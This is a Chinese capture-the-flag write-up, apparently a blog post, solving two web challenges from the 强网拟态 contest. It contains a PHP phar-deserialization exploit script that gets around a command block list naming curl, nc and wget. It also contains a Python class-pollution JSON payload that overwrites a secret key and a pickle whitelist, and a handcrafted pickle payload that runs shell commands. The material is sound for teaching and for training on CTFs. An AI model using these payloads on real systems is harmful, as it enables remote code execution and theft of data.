强网拟态wp

本文最后更新于:2024年12月14日 下午

capoo

1
capoo=file:///var/www/html/showpic.php

读源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
class CapooObj {
    public function __wakeup()
    {
	$action = $this->action;
	$action = str_replace("\"", "", $action);
	$action = str_replace("\'", "", $action);
	$banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|\~|\`|\r|\n|\t|\	|\^|ls|\.|tail|watch|wget|\||\;|\:|\(|\)|\{|\}|\*|\?|\[|\]|\@|\\|\=|\<)/i";
	if(preg_match($banlist, $action)){
		die("Not Allowed!");
	}
        system($this->action);
    }
}
header("Content-type:text/html;charset=utf-8");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['capoo'])) {
    $file = $_POST['capoo'];
    
    if (file_exists($file)) {
        $data = file_get_contents($file);
        $base64 = base64_encode($data);
    } else if (substr($file, 0, strlen("http://")) === "http://") {
        $data = file_get_contents($_POST['capoo'] . "/capoo.gif");
        if (strpos($data, "PILER") !== false) {
	        die("Capoo piler not allowed!");
        }
        file_put_contents("capoo_img/capoo.gif", $data);
        die("Download Capoo OK");
    } else {
        die('Capoo does not exist.');
    }
} else {
    die('No capoo provided.');
}
?>
<!DOCTYPE html>
<html>
  <head>
    <title>Display Capoo</title>
  </head>
  <body>
    <img style='display:block; width:100px;height:100px;' id='base64image'
       src='data:image/gif;base64, <?php echo $base64;?>' />
  </body>
</html>

没入口,打php反序列化,exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php 
class CapooObj {
    public $action;
    public function __wakeup()
    {
	$action = $this->action;
	$action = str_replace("\"", "", $action);
	$action = str_replace("\'", "", $action);
	$banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|\~|\`|\r|\n|\t|\	|\^|ls|\.|tail|watch|wget|\||\;|\:|\(|\)|\{|\}|\*|\?|\[|\]|\@|\\|\=|\<)/i";
	if(preg_match($banlist, $action)){
		die("Not Allowed!");
	}
        system($this->action);
    }
}
$a = new CapooObj();
$a->action="du -a /";
$tttang=new phar('test.phar',0);//后缀名必须为phar
$tttang->startBuffering();//开始缓冲 Phar 写操作
$tttang->setMetadata($a);//自定义的meta-data存入manifest
$tttang->setStub("<?php __HALT_COMPILER();?>");//设置stub,stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件,可以利用这点绕过文件上传检测
$tttang->addFromString("test.txt","test");//添加要压缩的文件
$tttang->stopBuffering();//停止缓冲对 Phar 归档的写入请求,并将更改保存到磁盘
?>

有过滤直接gzip绕一下

1
gzip test.phar

文件挂自己服务器上

image-20241020003524831

下载之后phar协议解析一下就行了

ez_picker

原型链污染把secret_key污染了

1
2
3
4
5
6
7
{
    "__init__" : {
            "__globals__" : {
                "secret_key" : "114514"
                }
            }
        }

顺手把waf也污染了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
{"username":"test","password":"test",
    "__init__" : {
            "__globals__" : {
                "safe_modules" :[
"\r",
"os",
"builtins",
"getattr",
"builtins\r",
"getattr\r",
"eval",
"eval\r",
"os\r","system\r",
"print",
"print\r",
"dict",
"globals"
],
"safe_names":[
"\r",
"os",
"builtins",
"getattr",
"builtins\r",
"getattr\r",
"eval",
"eval\r",
"os\r","system\r",
"print",
"print\r",
"dict",
"globals"
]
                }
            }}

完事伪造jwt,上传pickle文件,想反弹shell发现不出网

直接走app.py回显

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1
cbuiltins
getattr
(g1
S'eval'
tR(S'__import__("os").system("cat /tr3e_fl4g_1s_h3re_lol> app.py")'
tR.
#CTF
强网拟态wp
http://gensokyo.cn/2024/11/28/强网拟态wp/
作者
s1ain
发布于
2024年11月28日
许可协议